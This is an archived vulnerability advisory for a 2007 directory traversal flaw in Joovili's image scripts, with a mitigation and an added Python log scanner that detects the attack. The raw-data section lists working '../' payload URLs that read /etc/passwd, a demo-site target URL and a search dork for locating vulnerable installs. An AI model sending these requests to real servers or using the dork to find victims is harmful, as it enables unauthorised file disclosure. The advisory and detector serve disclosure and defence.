Vendor: Joovili
By: EcHoLL
CVSS: 5.5 (MEDIUM)
CWE: 22 (Directory Traversal)
Product Name: Joovili
Affected Version From: 2.***
Affected Version To: 3.**
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

Directory Traversal in Joovili

The vulnerability allows an attacker to traverse directories and read sensitive files such as /etc/passwd. It is triggered by placing traversal sequences in the 'picture' parameter passed to the image-serving script in the URL.

Mitigation:

Validate and sanitize the 'picture' parameter so that directory traversal sequences are rejected before the path is used, and restrict the web application's access to sensitive files and directories.
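Added defensive example (not part of the advisory or of Joovili's code): a Python access-log scanner that canonicalizes the 'picture' parameter before judging it, so it flags the payloads listed in the Exploit-DB raw data, including the '../..//' variant, while passing harmless paths that merely contain '..'. It assumes combined log format and the two handler script names given in the advisory; the sample log lines are constructed.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Request line inside a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Image handlers named in the advisory (versions 2.x and 3.x respectively).
IMAGE_SCRIPTS = ("images.inc.php", "joovili.images.php")

def canonical_picture(value: str) -> str:
    """Canonicalize a 'picture' value the way the filesystem resolves it:
    collapse repeated slashes (defeats the '../..//' variant) and fold '.'
    and '..' segments. A plain '../' substring check would miss '..//' and
    would falsely flag harmless paths like 'gallery/../gallery/dog.jpg'."""
    return posixpath.normpath(re.sub(r"/+", "/", value))

def escapes_image_dir(value: str) -> bool:
    """True when the canonical path climbs above the image directory or is
    absolute; 'photos/../cat.jpg' canonicalizes to 'cat.jpg' and is allowed."""
    norm = canonical_picture(value)
    return norm == ".." or norm.startswith("../") or norm.startswith("/")

def scan_log(lines):
    """Return (line_no, raw_value, canonical_value) for each request to an
    image handler whose 'picture' parameter escapes the image directory."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(IMAGE_SCRIPTS):
            continue
        for pic in parse_qs(url.query, keep_blank_values=True).get("picture", []):
            if escapes_image_dir(pic):
                hits.append((n, pic, canonical_picture(pic)))
    return hits

# Constructed sample log lines; entries 2 and 3 carry the advisory's payloads.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Dec/2007:10:00:01 +0000] "GET /include/images.inc.php?picture=gallery/cat.jpg&thumbnail=TRUE HTTP/1.1" 200 5120',
    '203.0.113.5 - - [27/Dec/2007:10:00:02 +0000] "GET /include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE HTTP/1.1" 200 1840',
    '203.0.113.5 - - [27/Dec/2007:10:00:03 +0000] "GET /include/joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE HTTP/1.1" 200 1840',
    '203.0.113.5 - - [27/Dec/2007:10:00:04 +0000] "GET /include/images.inc.php?picture=gallery/../gallery/dog.jpg&thumbnail=FALSE HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for line_no, raw, canon in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: picture={raw!r} resolves to {canon!r}")
```

Only lines 2 and 3 are reported; line 4 stays inside the image directory once canonicalized and is not a false positive.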
Source

Exploit-DB raw data:

found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
 
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili

# milw0rm.com [2007-12-27]